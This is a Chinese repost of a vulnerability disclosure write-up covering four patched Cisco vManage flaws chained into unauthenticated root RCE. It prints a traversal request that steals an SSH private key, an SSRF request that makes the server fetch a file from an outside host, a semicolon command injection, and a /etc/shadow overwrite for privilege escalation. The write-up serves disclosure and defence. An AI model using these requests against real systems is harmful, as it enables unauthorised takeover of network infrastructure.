Cisco vManage漏洞分析:未授权RCE与权限提升完整攻击链

news/2025/10/7 14:15:32/文章来源:https://www.cnblogs.com/qife122/p/19128461

SD-PWN — 第3部分 — Cisco vManage — 又一日,又一次网络接管

这是四部分系列中的第三篇文章,前两部分请参阅:

  • 第1部分 — Silver Peak Unity Orchestrator
  • 第2部分 — Citrix SD-WAN Center

本文继续我们的SD-WAN之旅。如果您尚未阅读第1和第2部分,强烈建议您查看。简而言之,我们在SD-WAN市场的四个主要产品中发现了关键的无认证RCE漏洞,这次我们将讨论Cisco Viptela vManage。

Cisco Viptela vManage

Cisco Viptela vManage是Cisco SD-WAN基础设施的核心,管理网络中的所有不同端点。由于SD-WAN设计的集中化特性,从安全角度来看,vManage是单点故障。

通过串联4个不同的漏洞,我们能够在vManage机器上获得无认证的root权限RCE,这些机器通常托管在公司的云环境中。攻击者无需任何配置的先验知识即可利用这些缺陷。

如果您的组织使用Cisco的Viptela SD-WAN解决方案,请紧急更新设备。最新固件已修复以下所有问题。

技术细节

系统的初始攻击向量是运行在vManage机器443端口上的Web管理服务器。该Web服务器使用JBoss框架运行Java小程序。Web管理接口的无认证攻击面在web.xml文件中列出,明确定义了所有可访问的URL路径。

SSRF + 任意文件写入 — CVE-2020–27128

在查看可能的入口点时,我们注意到了/dataservice入口点。我们不确定代码的确切意图,但我们的假设是不同的端点使用dataservice URL共享数据和统计信息。

/dataservice/statistics/download/dr/filelist处理程序负责下载系统中两台机器之间的统计信息。它接收相邻机器的IP地址和统计文件名并下载以供后续使用。

完全没有进行用户输入验证,导致了多个漏洞。首先,任何IP都可以通过sourcevManageIp参数传递给处理程序,允许进行SSRF攻击。其次,tokenfileType参数中的目录遍历允许攻击者将上述数据下载到任何目标路径,甚至可以覆盖现有文件。

服务器以vmanage用户身份运行,允许覆盖一些有趣的文件。

此外,该处理程序没有受到任何CSRF机制的保护。

POST /dataservice/statistics/download/dr/filelist HTTP/1.1
Host: 192.168.100.2:8443
Content-Length: 210
Origin: https://192.168.100.2:8443
Content-Type: application/json{"queue":0, "fileType":"/../../../../../../../tmp/", "deviceIp":"", "sourcevManageIp":"1.2.3.4:12345", "fileList" : [{"file" : "droppeb.bin", "token":"../../../../../../../../../../../"}]}

将导致服务器GET以下路径:

https://1.2.3.4:12345/dataservice/statistics/download/remoteprocessing/file/../../../../../../../dropped.bin

并将文件内容写入:

/opt/data/app-server/statistics/queue-0//../../../../../../../tmp/dropped.bin

尽管这是一个可能被利用来实现RCE的关键漏洞,但它不是最终攻击链的一部分。

未授权文件读取 + 目录遍历 — CVE-2020–26073

在上面的处理程序旁边,我们注意到了另一个有趣的处理程序 — /dataservice/disasterrecovery/download/token/

它接收一个参数 — 要读取的文件...再次,没有执行用户输入验证,允许轻松利用目录遍历。攻击者能够读取vManage用户可访问的任何文件。

GET /dataservice/disasterrecovery/download/token/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2Fetc%2Fviptela%2F.ssh%2Fid_dsa HTTP/1.1
Host: 192.168.100.2:443

将读取/etc/viptela/.ssh/id_dsa的内容。

SSH密钥

/etc/viptela/.ssh/id_dsa是用于SSH连接的秘密私钥,具有vmanage用户的读取权限。它允许攻击者以vmanage-admin身份通过SSH连接。

vmanage-admin的登录二进制文件是viptela_cli,与admin相同,但vmanage-admin无法访问常规CLI控制台。这是在viptela_cli的主函数中决定的,该函数验证用户名。否则,用户可以通过SSH连接发送单个命令,这提供了一些攻击面。

viptela_cli中的命令注入 — CVE-2020–27129

使用上述SSH密钥登录后,viptela_cli解析用户提供的命令。通过SSH连接发送的任何命令在执行前都会经过验证。

通常只允许以scp -f开头的命令。不幸的是,对命令的其余部分没有执行任何清理,允许攻击者使用分号注入另一个命令。

scp -f -h; touch /tmp/exploit;

上面的命令将以vmanage-admin用户身份运行。

使用busybox.suid进行权限提升 — CVE-2020–26074

在寻找系统中提升权限的不同选项时,我们注意到了一个特殊的suid文件 — busybox.suid。文件系统中的SUID位将在每次执行时将二进制文件的权限提升为root。busybox.suid允许以root身份运行多个busybox小程序。

一个有趣的小程序是tftp,它允许使用tftp协议向系统上传和下载文件。没有对目标路径进行验证,使恶意用户能够以root身份用任何给定数据覆盖任何文件。这使得可以完全控制系统。

一个基本示例是用新的root密码覆盖/etc/shadow文件,然后简单地运行su来获得root访问权限。

完整RCE攻击链

  1. 使用目录遍历漏洞读取vmanage-admin的私有SSH密钥
  2. 通过SSH登录并注入将运行权限提升的命令
  3. 使用busybox.suid的tftp小程序覆盖/etc/shadow
  4. 运行su命令获得root命令执行

请注意,这只是利用这些漏洞的一种方式。可能会找到其他可能更简单的攻击链。

时间线

Realmode Labs要感谢Cisco及其PSIRT在报告和修复这些缺陷过程中的出色沟通。

  • 2020-07-31 — Realmode Labs向Cisco PSIRT发送初始报告
  • 2020-07-31 — Cisco PSIRT确认报告,分配经理
  • 2020-11-02 — Cisco PSIRT分配CVE编号,发布修复软件
  • 2020-11-04 — 发布公告和CVE
  • 2020-11-23 — 本报告发布

请确保在LinkedIn上关注我们或通过contact@realmodelabs.com联系我们,以获取下一个SD-PWN漏洞帖子。

如果您有兴趣对您的某个产品进行安全审计,请联系我们。我们的团队由最高水平的研究人员组成,在发现最难以捉摸的漏洞方面有着良好的记录。

参考资料

  • 漏洞1 — SSRF + 任意文件写入 — CVE-2020–27128
    https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-vmanage-file-Y2JSRNRb

  • 漏洞2 — 未授权文件读取 + 目录遍历 — CVE-2020–26073
    https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-vman-traversal-hQh24tmk

  • 漏洞3 — viptela_cli中的命令注入 — CVE-2020–27129
    https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-vmanage-privilege-zPmMf73k

  • 漏洞4 — 使用busybox.suid进行权限提升 — CVE-2020–26074
    https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-vmanage-escalation-Jhqs5Skf
    更多精彩内容 请关注我的个人公众号 公众号(办公AI智能小助手)
    对网络安全、黑客技术感兴趣的朋友可以关注我的安全公众号(网络安全技术点滴分享)

公众号二维码

公众号二维码

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/930495.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

ps做游戏下载网站seo人员培训

本文由简码编程原创,保留所有版权,转载请注明出处。 本python人工智能爬虫系列教程基于Python3.0版本, 将python结合windows桌面开发工具aardio一起做可视化的开发, 用python做逻辑处理,用aardio做窗口界面, 不用再看着黑黑的python命令行窗口, 有window…

爱建站吧软文广告推广

对python这个高级语言感兴趣的小伙伴,下面一起跟随编程之家 jb51.cc的小编两巴掌来看看吧!访问FTP,无非两件事情:upload和download,最近在项目中需要从ftp下载大量文件,然后我就试着去实验自己的ftp操作类&…

铁总建设函网站怎么做招投标网站

看了很多教程,花了1天半的时间装上了,记录下。 前置条件:我安装了VS2015,用来编译工程。 参考资料 官方:http://www.vtk.org/Wiki/VTK/Building 安装:http://blog.csdn.net/Chinamming/article/details/1…

硅芯片创新如何成为云计算成功的关键

本文深入探讨了某中心通过自研芯片技术推动云计算发展的历程,包括Nitro系统、Graviton处理器及机器学习专用芯片的创新,揭示了硅芯片在提升性能、降低功耗方面的核心技术突破。硅芯片创新如何成为云计算成功的关键 某…

东萍象棋 DhtmlXQ UBB 转 中国象棋云库查询 FEN

<html><meta charset="utf-8"> <title>ubb2fen</title> <style> button { font-size:18pt; width:5em } #ta { outline:none } </style> <body> <p><bu…

【开源工具】基于PyQt5工作时长计算器工具开发全解析 - 教程

pre { white-space: pre !important; word-wrap: normal !important; overflow-x: auto !important; display: block !important; font-family: "Consolas", "Monaco", "Courier New", …

十六、【前端强化篇】完善 TestCase 编辑器:支持 API 结构化定义与断言安装

十六、【前端强化篇】完善 TestCase 编辑器:支持 API 结构化定义与断言安装2025-10-07 14:04 tlnshuju 阅读(0) 评论(0) 收藏 举报pre { white-space: pre !important; word-wrap: normal !important; overflow-x…

斑马ZT210碳带及纸张安装教程

1、碳带安装方法说明图:2、纸张安装说明图:3、综合图:4、实物图:

石家庄网站搭建定制vi设计获奖作品

一.概述 1.1 以太网指的是由Xerox公司创建并由Xerox、Intel和DEC公司联合开发的基带总线局域网规范&#xff0c;是当今现有局域网采用的最通用的通信协议标准。以太网络使用CSMA/CD技术。 1.2 以太网在局域网各种技术中占统治性地位。 造价低;是应用最广泛的局域网技术。比令…

DHCP及DNS

dhcp enable //开启dncp ip pool xxx //创建一个叫xxx的地址池 network xxx.xxx mask yyy.yyy//设置地址池的相关参数 gateway-list zzz.zzz//设置地址池的网关 dns-list ddd.ddd//设置地址池的DNS huawei路由器还…

Gitlab Runner 学习

Gitlab Runner 学习 runner下载|安装|启动 下载 # 为您的系统下载二进制文件 sudo curl -L --output /usr/local/bin/gitlab-runner https://gitlab-runner-downloads.s3.amazonaws.com/latest/binaries/gitlab-runne…

代做备案网站专业郑州企业网站建设

文章目录 1. 简介2. 用法1&#xff09;单个 CommandLineRunner2&#xff09;多个 CommandLineRunner 3. 优点4. 缺点总结 CommandLineRunner 是 Spring Boot 提供的一个接口&#xff0c;用于在 Spring Boot 应用程序启动后执行一些任务。通过实现 CommandLineRunner 接口&#…

东莞网站建设设计公司网站怎么添加域名

Redisson 中的 RScoredSortedSet 类是对 Redis 内置的 Sorted Set 数据结构的一个封装&#xff0c;它支持对集合中的元素进行排序&#xff0c;每个元素都有一个与之关联的分数(score)。 RScoredSortedSet 可以用于多种场景&#xff0c;以下是一些常见的使用案例&#xff1a; 排…

AI元人文:论价值原语博弈与人文知识库共建如何重塑智能社会的决策基石

AI元人文:论价值原语博弈与人文知识库共建如何重塑智能社会的决策基石 我们这个时代面临着深刻的人文困境。表面上是技术冲击与规则失能,实则是规则逻辑与人文逻辑的断裂。规则逻辑构筑现代社会的效率骨架,人文逻辑…

佳木斯网站建设网站建设报价明细表

【Matlab】智能优化算法_麻雀搜索算法SSA 1.背景介绍2.数学模型3.文件结构4.伪代码5.详细代码及注释5.1 Get_Functions_details.m5.2 main.m5.3 SSA.m 6.运行结果7.参考文献 1.背景介绍 麻雀通常是群居的鸟类&#xff0c;有很多种类。它们分布在世界的大部分地区&#xff0c;喜…

算法第一张作业

一、代码规范 对于大学生来说,不需要一开始就追求大公司那样面面俱到的规范,但也要抓住以下几个核心要点:命名规范,这是最重要、也是最容易见效的一条。 (1)变量/函数名:使用有意义的英文单词,不要用拼音或a, …

怎么使自己的网站秦淮做网站价格

六西格玛&#xff0c;这个在业界久负盛名的管理理念&#xff0c;它的魅力太强大了。曾听闻它能帮助企业和个人提升竞争力&#xff0c;但当真正走进这个培训体系时&#xff0c;会发现它的影响力远超你的想象。 在六西格玛的指导下&#xff0c;企业实现了显著的转变。之前那些看…

MySQL CentOS7 本地安装

假设已经删除了MySQL,如果你没有删除可以搜索一下 mysql-libs.zip 百度网盘 我这里是使用了unzip来解压 sudo yum install -y unzip zip unzip mysql-libs.zip cd mysql-libs 本来是使用rpm,但是这里缺少perl error:…

TypeScript装饰器 - Ref

TypeScript装饰器 01-简介02-类装饰器03-装饰器工厂04-装饰器组合05-属性装饰器06-方法装饰器07-访问器装饰器08-参数装饰器